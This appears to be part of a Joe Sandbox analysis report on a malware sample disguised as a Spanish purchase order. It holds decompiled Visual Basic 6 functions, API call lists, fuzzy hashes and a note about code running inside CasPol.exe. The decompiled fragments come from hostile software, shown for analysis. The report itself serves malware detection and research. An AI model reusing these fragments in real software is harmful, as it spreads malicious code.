Associated: 00000000.00000002.366793825.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366797544.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366803272.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ORDEN DE COMPRA 80107.jbxd

Yara matches

Similarity

API ID: __vba$CheckFreeHresult$New2$Chkstk$Copy
String ID: Z
API String ID: 4013484316-987989993
Opcode ID: eeabe3ed17726963dfc5374d187e1ba2b2825d56fc0543fc6fcb20d844f77fa7
Instruction ID: 1f445268c862607542e9a2b9fbaa8659764cae9ff10379e78988c4ef704c0da1
Opcode Fuzzy Hash: eeabe3ed17726963dfc5374d187e1ba2b2825d56fc0543fc6fcb20d844f77fa7
Instruction Fuzzy Hash: CF61E470A01218EFCF10EF95E889BDDBBB5BF08704F60402AF402BB2A0C7B95955DB59

Uniqueness

Uniqueness Score: -1.00%

Function 004286F9 Relevance: 25.7, APIs: 17, Instructions: 160
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 53%

			E004286F9(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a32) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				char _v28;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr* _v48;
				signed int _v52;
				intOrPtr* _v60;
				signed int _v64;
				intOrPtr* _v68;
				signed int _v72;
				intOrPtr* _v76;
				signed int _v80;
				char* _t71;
				signed int _t75;
				char* _t79;
				signed int _t82;
				char* _t86;
				signed int _t90;
				intOrPtr _t116;

				_push(0x401336);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t116;
				_push(0x3c);
				L00401330();
				_v12 = _t116;
				_v8 = 0x4012f0;
				L00401504();
				if( *0x42a010 != 0) {
					_v60 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v60 = 0x42a010;
				}
				_t71 =  &_v28;
				L00401564();
				_v48 = _t71;
				_v36 = 0x80020004;
				_v44 = 0xa;
				L00401330();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t75 =  *((intOrPtr*)( *_v48 + 0x12c))(_v48, 0x10, _t71,  *((intOrPtr*)( *((intOrPtr*)( *_v60)) + 0x34c))( *_v60));
				asm("fclex");
				_v52 = _t75;
				if(_v52 >= 0) {
					_v64 = _v64 & 0x00000000;
				} else {
					_push(0x12c);
					_push(0x40fddc);
					_push(_v48);
					_push(_v52);
					L00401558();
					_v64 = _t75;
				}
				L00401552();
				if( *0x42a010 != 0) {
					_v68 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v68 = 0x42a010;
				}
				_t79 =  &_v28;
				L00401564();
				_v48 = _t79;
				_t82 =  *((intOrPtr*)( *_v48 + 0x1d8))(_v48, _t79,  *((intOrPtr*)( *((intOrPtr*)( *_v68)) + 0x338))( *_v68));
				asm("fclex");
				_v52 = _t82;
				if(_v52 >= 0) {
					_v72 = _v72 & 0x00000000;
				} else {
					_push(0x1d8);
					_push(0x40fabc);
					_push(_v48);
					_push(_v52);
					L00401558();
					_v72 = _t82;
				}
				L00401552();
				if( *0x42a010 != 0) {
					_v76 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v76 = 0x42a010;
				}
				_t86 =  &_v28;
				L00401564();
				_v48 = _t86;
				_v36 = 0x80020004;
				_v44 = 0xa;
				L00401330();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t90 =  *((intOrPtr*)( *_v48 + 0x1b0))(_v48, 0x10, _t86,  *((intOrPtr*)( *((intOrPtr*)( *_v76)) + 0x360))( *_v76));
				asm("fclex");
				_v52 = _t90;
				if(_v52 >= 0) {
					_v80 = _v80 & 0x00000000;
				} else {
					_push(0x1b0);
					_push(0x40faec);
					_push(_v48);
					_push(_v52);
					L00401558();
					_v80 = _t90;
				}
				L00401552();
				_push(0x42891d);
				L00401516();
				return _t90;
			}

0x004286fe
0x00428709
0x0042870a
0x00428711
0x00428714
0x0042871c
0x0042871f
0x0042872c
0x00428738
0x00428752
0x0042873a
0x0042873a
0x0042873f
0x00428744
0x00428749
0x00428749
0x0042876d
0x00428771
0x00428776
0x00428779
0x00428780
0x0042878a
0x00428794
0x00428795
0x00428796
0x00428797
0x004287a0
0x004287a6
0x004287a8
0x004287af
0x004287cb
0x004287b1
0x004287b1
0x004287b6
0x004287bb
0x004287be
0x004287c1
0x004287c6
0x004287c6
0x004287d2
0x004287de
0x004287f8
0x004287e0
0x004287e0
0x004287e5
0x004287ea
0x004287ef
0x004287ef
0x00428813
0x00428817
0x0042881c
0x00428827
0x0042882d
0x0042882f
0x00428836
0x00428852
0x00428838
0x00428838
0x0042883d
0x00428842
0x00428845
0x00428848
0x0042884d
0x0042884d
0x00428859
0x00428865
0x0042887f
0x00428867
0x00428867
0x0042886c
0x00428871
0x00428876
0x00428876
0x0042889a
0x0042889e
0x004288a3
0x004288a6
0x004288ad
0x004288b7
0x004288c1
0x004288c2
0x004288c3
0x004288c4
0x004288cd
0x004288d3
0x004288d5
0x004288dc
0x004288f8
0x004288de
0x004288de
0x004288e3
0x004288e8
0x004288eb
0x004288ee
0x004288f3
0x004288f3
0x004288ff
0x00428904
0x00428917
0x0042891c

APIs

__vbaChkstk.MSVBVM60(?,00401336), ref: 00428714
__vbaStrCopy.MSVBVM60(?,?,?,?,00401336), ref: 0042872C
__vbaNew2.MSVBVM60(004101D4,0042A010,?,?,?,?,00401336), ref: 00428744
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00401336), ref: 00428771
__vbaChkstk.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,00401336), ref: 0042878A
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FDDC,0000012C,?,?,?,?,?,?,?,?,?,?,?,00401336), ref: 004287C1
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,00401336), ref: 004287D2
__vbaNew2.MSVBVM60(004101D4,0042A010,?,?,?,?,?,?,?,?,?,?,?,00401336), ref: 004287EA
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00401336), ref: 00428817
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FABC,000001D8), ref: 00428848
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00401336), ref: 00428859
__vbaNew2.MSVBVM60(004101D4,0042A010,?,?,?,?,?,?,?,?,?,?,?,?,?,00401336), ref: 00428871
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042889E
__vbaChkstk.MSVBVM60(?,00000000), ref: 004288B7
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FAEC,000001B0), ref: 004288EE
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00401336), ref: 004288FF
__vbaFreeStr.MSVBVM60(0042891D), ref: 00428917

Memory Dump Source

Source File: 00000000.00000002.366782993.0000000000413000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.366760413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366764718.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366771153.0000000000406000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366777936.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366793825.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366797544.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366803272.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ORDEN DE COMPRA 80107.jbxd

Yara matches

Similarity

API ID: __vba$Free$CheckChkstkHresultNew2$Copy
String ID:
API String ID: 3778991914-0
Opcode ID: a6ad3c30ecafb7958bf22d5126ef6c8a9d3eef6a792346dd79bfb1f3c89ba5c6
Instruction ID: 754ce0addf520ba5bb4d0e54f71d6579c45130bfa5779e6d2e4f1a344d14315a
Opcode Fuzzy Hash: a6ad3c30ecafb7958bf22d5126ef6c8a9d3eef6a792346dd79bfb1f3c89ba5c6
Instruction Fuzzy Hash: EB610770A10218EFCB10EFA5D849BDDBBB5BF48704F60442AF502BB2A1CBB95845DF59

Uniqueness

Uniqueness Score: -1.00%

Function 00426BBC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00426BBC(void* __ebx, void* __edi, void* __esi, intOrPtr __fp0, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v28;
				char _v32;
				intOrPtr _v40;
				char _v48;
				intOrPtr* _v68;
				signed int _v72;
				intOrPtr* _v84;
				signed int _v88;
				char* _t42;
				signed int _t45;
				void* _t54;
				void* _t56;
				intOrPtr _t57;

				_t57 = _t56 - 0xc;
				 *[fs:0x0] = _t57;
				L00401330();
				_v16 = _t57;
				_v12 = 0x401228;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x40,  *[fs:0x0], 0x401336, _t54);
				_v40 = 0x80020004;
				_v48 = 0xa;
				_push( &_v48);
				L00401480();
				 *((intOrPtr*)(_a4 + 0x50)) = __fp0;
				L0040158E();
				if( *0x42a010 != 0) {
					_v84 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v84 = 0x42a010;
				}
				_t42 =  &_v32;
				L00401564();
				_v68 = _t42;
				_t45 =  *((intOrPtr*)( *_v68 + 0x1ac))(_v68, _t42,  *((intOrPtr*)( *((intOrPtr*)( *_v84)) + 0x348))( *_v84));
				asm("fclex");
				_v72 = _t45;
				if(_v72 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
					_push(0x1ac);
					_push(0x40faec);
					_push(_v68);
					_push(_v72);
					L00401558();
					_v88 = _t45;
				}
				L00401552();
				_push(L"Indtgtsfrende");
				L004014CE();
				_v28 = _t45;
				asm("wait");
				_push(0x426cd0);
				return _t45;
			}

0x00426bbf
0x00426bce
0x00426bd8
0x00426be0
0x00426be3
0x00426bea
0x00426bf9
0x00426bfc
0x00426c03
0x00426c0d
0x00426c0e
0x00426c16
0x00426c1c
0x00426c28
0x00426c42
0x00426c2a
0x00426c2a
0x00426c2f
0x00426c34
0x00426c39
0x00426c39
0x00426c5d
0x00426c61
0x00426c66
0x00426c71
0x00426c77
0x00426c79
0x00426c80
0x00426c9c
0x00426c82
0x00426c82
0x00426c87
0x00426c8c
0x00426c8f
0x00426c92
0x00426c97
0x00426c97
0x00426ca3
0x00426ca8
0x00426cad
0x00426cb2
0x00426cb6
0x00426cb7
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401336), ref: 00426BD8
#593.MSVBVM60(0000000A), ref: 00426C0E
__vbaFreeVar.MSVBVM60(0000000A), ref: 00426C1C
__vbaNew2.MSVBVM60(004101D4,0042A010,0000000A), ref: 00426C34
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,0000000A), ref: 00426C61
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FAEC,000001AC,?,?,?,?,?,?,?,?,0000000A), ref: 00426C92
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,0000000A), ref: 00426CA3
#696.MSVBVM60(Indtgtsfrende,?,?,?,?,?,?,?,?,0000000A), ref: 00426CAD

Strings

Indtgtsfrende, xrefs: 00426CA8

Memory Dump Source

Source File: 00000000.00000002.366782993.0000000000413000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.366760413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366764718.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366771153.0000000000406000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366777936.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366793825.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366797544.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366803272.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ORDEN DE COMPRA 80107.jbxd

Yara matches

Similarity

API ID: __vba$Free$#593#696CheckChkstkHresultNew2
String ID: Indtgtsfrende
API String ID: 4022956705-159358649
Opcode ID: ce54c6144b18f3f3b0736a63a3893088caa2c4c5ae8a97ac4725d94555456ea9
Instruction ID: d74191c35a4a655d446758a1f5036cfbcffce39426c49ce26a5631ca383e71ec
Opcode Fuzzy Hash: ce54c6144b18f3f3b0736a63a3893088caa2c4c5ae8a97ac4725d94555456ea9
Instruction Fuzzy Hash: 7731F670A00218EFCB10EFE5D84ABDDBBB4FF08704F50846AE546BB2A1C7795905CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0041123F Relevance: 15.1, APIs: 10, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0041123F(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				short _v24;
				char _v28;
				intOrPtr _v36;
				intOrPtr _v44;
				void* _v48;
				intOrPtr* _v52;
				signed int _v56;
				intOrPtr* _v64;
				signed int _v68;
				intOrPtr* _v72;
				signed int _v76;
				char* _t52;
				signed int _t56;
				char* _t60;
				signed int _t64;
				short _t65;
				intOrPtr _t82;

				_a4 = _a4 - 0xffff;
				_push(0x401336);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t82;
				_push(0x38);
				L00401330();
				_v12 = _t82;
				_v8 = 0x4012b0;
				if( *0x42a010 != 0) {
					_v64 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v64 = 0x42a010;
				}
				_t52 =  &_v28;
				L00401564();
				_v52 = _t52;
				_v36 = 0x80020004;
				_v44 = 0xa;
				L00401330();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t56 =  *((intOrPtr*)( *_v52 + 0x174))(_v52, 0x10, _t52,  *((intOrPtr*)( *((intOrPtr*)( *_v64)) + 0x31c))( *_v64));
				asm("fclex");
				_v56 = _t56;
				if(_v56 >= 0) {
					_v68 = _v68 & 0x00000000;
				} else {
					_push(0x174);
					_push(0x40fc94);
					_push(_v52);
					_push(_v56);
					L00401558();
					_v68 = _t56;
				}
				L00401552();
				if( *0x42a010 != 0) {
					_v72 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v72 = 0x42a010;
				}
				_t60 =  &_v28;
				L00401564();
				_v52 = _t60;
				_t64 =  *((intOrPtr*)( *_v52 + 0x1a0))(_v52,  &_v48, _t60,  *((intOrPtr*)( *((intOrPtr*)( *_v72)) + 0x320))( *_v72));
				asm("fclex");
				_v56 = _t64;
				if(_v56 >= 0) {
					_v76 = _v76 & 0x00000000;
				} else {
					_push(0x1a0);
					_push(0x40fabc);
					_push(_v52);
					_push(_v56);
					L00401558();
					_v76 = _t64;
				}
				_t65 = _v48;
				_v24 = _t65;
				L00401552();
				_push(0x427ea1);
				return _t65;
			}

0x0041123f
0x00427d2f
0x00427d3a
0x00427d3b
0x00427d42
0x00427d45
0x00427d4d
0x00427d50
0x00427d5e
0x00427d78
0x00427d60
0x00427d60
0x00427d65
0x00427d6a
0x00427d6f
0x00427d6f
0x00427d93
0x00427d97
0x00427d9c
0x00427d9f
0x00427da6
0x00427db0
0x00427dba
0x00427dbb
0x00427dbc
0x00427dbd
0x00427dc6
0x00427dcc
0x00427dce
0x00427dd5
0x00427df1
0x00427dd7
0x00427dd7
0x00427ddc
0x00427de1
0x00427de4
0x00427de7
0x00427dec
0x00427dec
0x00427df8
0x00427e04
0x00427e1e
0x00427e06
0x00427e06
0x00427e0b
0x00427e10
0x00427e15
0x00427e15
0x00427e39
0x00427e3d
0x00427e42
0x00427e51
0x00427e57
0x00427e59
0x00427e60
0x00427e7c
0x00427e62
0x00427e62
0x00427e67
0x00427e6c
0x00427e6f
0x00427e72
0x00427e77
0x00427e77
0x00427e80
0x00427e84
0x00427e8b
0x00427e90
0x00000000

APIs

__vbaChkstk.MSVBVM60(00000000,00401336), ref: 00427D45
__vbaNew2.MSVBVM60(004101D4,0042A010,?,0000000A,?,00000000,00401336), ref: 00427D6A
__vbaObjSet.MSVBVM60(000000D8,00000000,?,0000000A,?,00000000,00401336), ref: 00427D97
__vbaChkstk.MSVBVM60(000000D8,00000000,?,0000000A,?,00000000,00401336), ref: 00427DB0
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FC94,00000174,?,0000000A,?,00000000,00401336), ref: 00427DE7
__vbaFreeObj.MSVBVM60(?,?,?,0000000A,?,00000000,00401336), ref: 00427DF8
__vbaNew2.MSVBVM60(004101D4,0042A010,?,?,?,0000000A,?,00000000,00401336), ref: 00427E10
__vbaObjSet.MSVBVM60(000000D8,00000000,?,?,?,0000000A,?,00000000,00401336), ref: 00427E3D
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FABC,000001A0,?,?,?,0000000A,?,00000000,00401336), ref: 00427E72
__vbaFreeObj.MSVBVM60(?,?,?,?,?,0000000A,?,00000000,00401336), ref: 00427E8B

Memory Dump Source

Source File: 00000000.00000002.366777936.000000000040D000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.366760413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366764718.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366771153.0000000000406000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366782993.0000000000413000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366793825.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366797544.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366803272.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ORDEN DE COMPRA 80107.jbxd

Yara matches

Similarity

API ID: __vba$CheckChkstkFreeHresultNew2
String ID:
API String ID: 4127847336-0
Opcode ID: 95f36ca77926d45a9961f8d0e0c633455dbf3c21d58e2c6bdacaf47a6d5a51a7
Instruction ID: 728ef10921c9bd073ee8619cd213bdd4aad32a66ed07166ee9dd4a21c4957ff2
Opcode Fuzzy Hash: 95f36ca77926d45a9961f8d0e0c633455dbf3c21d58e2c6bdacaf47a6d5a51a7
Instruction Fuzzy Hash: 8D413970A10218EFCB11EFA4D84AFEDB7B5BF08704F60006AF502BB2A0C7795941DB59

Uniqueness

Uniqueness Score: -1.00%

Function 004266C1 Relevance: 12.1, APIs: 8, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E004266C1(void* __ebx, void* __ecx, void* __edi, void* __esi) {
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v36;
				intOrPtr _v44;
				intOrPtr _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				intOrPtr _v76;
				intOrPtr* _v80;
				signed int _v84;
				intOrPtr* _v92;
				signed int _v96;
				char* _t36;
				signed int _t42;
				intOrPtr _t47;
				intOrPtr* _t59;

				_push(0x401336);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t59;
				_push(0x4c);
				L00401330();
				_v12 = _t59;
				_v8 = 0x401200;
				if( *0x42a010 != 0) {
					_v92 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v92 = 0x42a010;
				}
				_t47 =  *((intOrPtr*)( *_v92));
				_t36 =  &_v28;
				L00401564();
				_v80 = _t36;
				_v68 = 0x80020004;
				_v76 = 0xa;
				_v52 = 0x80020004;
				_v60 = 0xa;
				_v36 = 0x80020004;
				_v44 = 0xa;
				L00401330();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401330();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401330();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t59 =  *0x4011f8;
				_t42 =  *((intOrPtr*)( *_v80 + 0x224))(_v80, _t47, 0x10, 0x10, 0x10, _t36,  *((intOrPtr*)(_t47 + 0x33c))( *_v92));
				asm("fclex");
				_v84 = _t42;
				if(_v84 >= 0) {
					_v96 = _v96 & 0x00000000;
				} else {
					_push(0x224);
					_push(0x40f9cc);
					_push(_v80);
					_push(_v84);
					L00401558();
					_v96 = _t42;
				}
				L00401552();
				_v24 = 0x7065c5;
				asm("wait");
				_push(0x4267f5);
				return _t42;
			}

0x004266c6
0x004266d1
0x004266d2
0x004266d9
0x004266dc
0x004266e4
0x004266e7
0x004266f5
0x0042670f
0x004266f7
0x004266f7
0x004266fc
0x00426701
0x00426706
0x00426706
0x00426720
0x0042672a
0x0042672e
0x00426733
0x00426736
0x0042673d
0x00426744
0x0042674b
0x00426752
0x00426759
0x00426763
0x0042676d
0x0042676e
0x0042676f
0x00426770
0x00426774
0x0042677e
0x0042677f
0x00426780
0x00426781
0x00426785
0x0042678f
0x00426790
0x00426791
0x00426792
0x0042679a
0x004267a5
0x004267ab
0x004267ad
0x004267b4
0x004267d0
0x004267b6
0x004267b6
0x004267bb
0x004267c0
0x004267c3
0x004267c6
0x004267cb
0x004267cb
0x004267d7
0x004267dc
0x004267e3
0x004267e4
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,00401336), ref: 004266DC
__vbaNew2.MSVBVM60(004101D4,0042A010,?,?,?,?,00401336), ref: 00426701
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042672E
__vbaChkstk.MSVBVM60(?,00000000), ref: 00426763
__vbaChkstk.MSVBVM60(?,00000000), ref: 00426774
__vbaChkstk.MSVBVM60(?,00000000), ref: 00426785
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040F9CC,00000224,?,?,00000000), ref: 004267C6
__vbaFreeObj.MSVBVM60(?,?,00000000), ref: 004267D7

Memory Dump Source

Source File: 00000000.00000002.366782993.0000000000413000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.366760413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366764718.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366771153.0000000000406000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366777936.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366793825.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366797544.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366803272.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ORDEN DE COMPRA 80107.jbxd

Yara matches

Similarity

API ID: __vba$Chkstk$CheckFreeHresultNew2
String ID:
API String ID: 3189907775-0
Opcode ID: 305cc99ecf518c4622a5fc01ae2ca6c306ed7a6223b56146c12f1a707c022dd4
Instruction ID: b0f46de4b79def431da7eecca9950a4c933df2faef0b86b6dbc007af210c8f1c
Opcode Fuzzy Hash: 305cc99ecf518c4622a5fc01ae2ca6c306ed7a6223b56146c12f1a707c022dd4
Instruction Fuzzy Hash: CC3157B0A00258EFDB11DFD0D84ABCEBBB5BF09718F60042AF901BF2A0C7B914458B59

Uniqueness

Uniqueness Score: -1.00%

Function 00426334 Relevance: 12.1, APIs: 8, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E00426334(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				char _v32;
				intOrPtr _v40;
				intOrPtr _v48;
				intOrPtr* _v52;
				signed int _v56;
				intOrPtr* _v68;
				signed int _v72;
				char* _t39;
				signed int _t43;
				void* _t56;
				void* _t58;
				intOrPtr _t59;

				_t59 = _t58 - 0xc;
				 *[fs:0x0] = _t59;
				L00401330();
				_v16 = _t59;
				_v12 = 0x4011d8;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x30,  *[fs:0x0], 0x401336, _t56);
				L00401504();
				if( *0x42a010 != 0) {
					_v68 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v68 = 0x42a010;
				}
				_t39 =  &_v32;
				L00401564();
				_v52 = _t39;
				_v40 = 1;
				_v48 = 2;
				L00401330();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t43 =  *((intOrPtr*)( *_v52 + 0x1d0))(_v52, 0x10, _t39,  *((intOrPtr*)( *((intOrPtr*)( *_v68)) + 0x300))( *_v68));
				asm("fclex");
				_v56 = _t43;
				if(_v56 >= 0) {
					_v72 = _v72 & 0x00000000;
				} else {
					_push(0x1d0);
					_push(0x40fafc);
					_push(_v52);
					_push(_v56);
					L00401558();
					_v72 = _t43;
				}
				L00401552();
				_push(0x42643e);
				L00401516();
				return _t43;
			}

0x00426337
0x00426346
0x00426350
0x00426358
0x0042635b
0x00426362
0x00426371
0x0042637a
0x00426386
0x004263a0
0x00426388
0x00426388
0x0042638d
0x00426392
0x00426397
0x00426397
0x004263bb
0x004263bf
0x004263c4
0x004263c7
0x004263ce
0x004263d8
0x004263e2
0x004263e3
0x004263e4
0x004263e5
0x004263ee
0x004263f4
0x004263f6
0x004263fd
0x00426419
0x004263ff
0x004263ff
0x00426404
0x00426409
0x0042640c
0x0042640f
0x00426414
0x00426414
0x00426420
0x00426425
0x00426438
0x0042643d

APIs

__vbaChkstk.MSVBVM60(?,00401336), ref: 00426350
__vbaStrCopy.MSVBVM60(?,?,?,?,00401336), ref: 0042637A
__vbaNew2.MSVBVM60(004101D4,0042A010,?,?,?,?,00401336), ref: 00426392
__vbaObjSet.MSVBVM60(?,00000000), ref: 004263BF
__vbaChkstk.MSVBVM60(?,00000000), ref: 004263D8
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FAFC,000001D0), ref: 0042640F
__vbaFreeObj.MSVBVM60 ref: 00426420
__vbaFreeStr.MSVBVM60(0042643E), ref: 00426438

Memory Dump Source

Source File: 00000000.00000002.366782993.0000000000413000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.366760413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366764718.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366771153.0000000000406000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366777936.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366793825.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366797544.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366803272.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ORDEN DE COMPRA 80107.jbxd

Yara matches

Similarity

API ID: __vba$ChkstkFree$CheckCopyHresultNew2
String ID:
API String ID: 2888502551-0
Opcode ID: c57179a116b976635c801a604b553877711c49a469848879dae8d8f25591165f
Instruction ID: 4f7ea6eb5ca2d005bc216824c74e828ddb0dd03d295fd064829bae0cb15e96e8
Opcode Fuzzy Hash: c57179a116b976635c801a604b553877711c49a469848879dae8d8f25591165f
Instruction Fuzzy Hash: F0312B70A00218EFCB11EF95D849FDDBBB5BF48708F50406AF802BB2A1C7B96905DB59

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: CasPol.exePID: 5640, Parent PID: 4600COMMON

Execution Graph

Execution Coverage:	10.5%
Dynamic/Decrypted Code Coverage:	96.4%
Signature Coverage:	0%
Total number of Nodes:	83
Total number of Limit Nodes:	8

Executed Functions

Function 1E066902 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 147
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 1E0669A0
GetCurrentThread.KERNEL32 ref: 1E0669DD
GetCurrentProcess.KERNEL32 ref: 1E066A1A
GetCurrentThreadId.KERNEL32 ref: 1E066A73

Strings

X8; , xrefs: 1E066A5E

Memory Dump Source

Source File: 00000007.00000002.567172808.000000001E060000.00000040.00000800.00020000.00000000.sdmp, Offset: 1E060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_1e060000_CasPol.jbxd

Similarity

API ID: Current$ProcessThread
String ID: X8;
API String ID: 2063062207-39420809
Opcode ID: 4632cb78c0e062b87f8eef7ebad52b5e0e0e0ac0e077d4d94312859e3a2461d2
Instruction ID: 69ad6ee947074308879c82dd894670a196ca090374a86879ba817e4755eb4714
